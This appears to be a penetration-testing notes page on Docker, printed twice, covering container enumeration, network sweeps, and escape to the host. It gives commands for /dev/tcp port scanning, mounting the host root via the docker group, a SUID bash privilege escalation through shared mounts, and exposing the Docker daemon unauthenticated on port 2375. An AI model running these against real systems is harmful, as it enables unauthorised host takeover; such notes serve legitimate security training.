Docker

Enumeration

Confirm the presence of .dockerenv

Check if running as root

cat /proc/self/status

Check SUID/SGID

find / -type f \( -perm -4000 -o -perm -2000 \)

Check processes

ps aux

Check the namespaces

cat /proc/self/ns/

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

If the socket is mounted you may be able to use docker-cli:

mount | grep docker.sock

ls -l /var/run/docker.sock

Understand the Network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Check the IPs

ip addr

Check the routing table

cat /proc/net/fib_trie

Always ping sweep the subnets

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Scan ports

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

Use OpenSSL to scan ports

for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do (echo "172.19.0.$host:$port" && openssl s_client -connect 172.19.0.$host:$port 2>/dev/null | grep CONNECTED) & done; done; wait

Check for Mounted File Systems

cat /proc/mounts
mount | grep <directory>

Look for vulnerabilities and misconfiguration

cat /etc/docker/daemon.json

Loop to mount containers

mkdir sda{1,2,3,4,5}
for number in 1 2 3 4 5; do mount /dev/sda$number sda$number; done

docker-cli

List running containers

docker ps

Check for containers running with elevated privileges (--privileged, --cap-add).
Look for containers that share host namespaces or file systems.

Check for docker images

docker images

Look for containers running as root or with --privileged mode:

docker inspect

Escape the container

Tools like nsenter or docker-exploit can be used to attempt escaping the container.

If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

File Ownership Manipulation via Shared Mounts

Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container

If the container is miss configured and can creates files as a root, and you can access the files created by the host on the container:
1. From the host, copy bash in to the mounted directory.
2. From the container, change the ownership and permissions of bash to root.
3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p

Configure Docker to listen on a TCP port

Open the Docker service file, typically at /lib/systemd/system/docker.service or /etc/systemd/system/docker.service.
Change ExecStart to bind a TCP address:

ExecStart=/usr/bin/dockerd --host=tcp://0.0.0.0:2375

Reload the daemon and restart Docker if needed:

systemctl daemon-reload
systemctl restart docker

Connect to it using docker-cli:

export DOCKER_HOST=tcp://<host_ip>:2375
docker ps

PreviousBuffer Overflow - Linux NextAbusing Wildcards

Last updated 2 months ago

Docker

Enumeration

Confirm the presence of .dockerenv

Check if running as root

cat /proc/self/status

Check SUID/SGID

find / -type f \( -perm -4000 -o -perm -2000 \)

Check processes

ps aux

Check the namespaces

cat /proc/self/ns/

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

If the socket is mounted you may be able to use docker-cli:

mount | grep docker.sock

ls -l /var/run/docker.sock

Understand the Network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Check the IPs

ip addr

Check the routing table

cat /proc/net/fib_trie

Always ping sweep the subnets

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Scan ports

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

Use OpenSSL to scan ports

for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do (echo "172.19.0.$host:$port" && openssl s_client -connect 172.19.0.$host:$port 2>/dev/null | grep CONNECTED) & done; done; wait

Check for Mounted File Systems

cat /proc/mounts
mount | grep <directory>

Look for vulnerabilities and misconfiguration

cat /etc/docker/daemon.json

Loop to mount containers

mkdir sda{1,2,3,4,5}
for number in 1 2 3 4 5; do mount /dev/sda$number sda$number; done

docker-cli

List running containers

docker ps

Check for containers running with elevated privileges (--privileged, --cap-add).
Look for containers that share host namespaces or file systems.

Check for docker images

docker images

Look for containers running as root or with --privileged mode:

docker inspect

Escape the container

Tools like nsenter or docker-exploit can be used to attempt escaping the container.

If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

File Ownership Manipulation via Shared Mounts

Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container

If the container is miss configured and can creates files as a root, and you can access the files created by the host on the container:
1. From the host, copy bash in to the mounted directory.
2. From the container, change the ownership and permissions of bash to root.
3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p

Configure Docker to listen on a TCP port

Open the Docker service file, typically at /lib/systemd/system/docker.service or /etc/systemd/system/docker.service.
Change ExecStart to bind a TCP address:

ExecStart=/usr/bin/dockerd --host=tcp://0.0.0.0:2375

Reload the daemon and restart Docker if needed:

systemctl daemon-reload
systemctl restart docker

Connect to it using docker-cli:

export DOCKER_HOST=tcp://<host_ip>:2375
docker ps

PreviousBuffer Overflow - Linux NextAbusing Wildcards

Last updated 2 months ago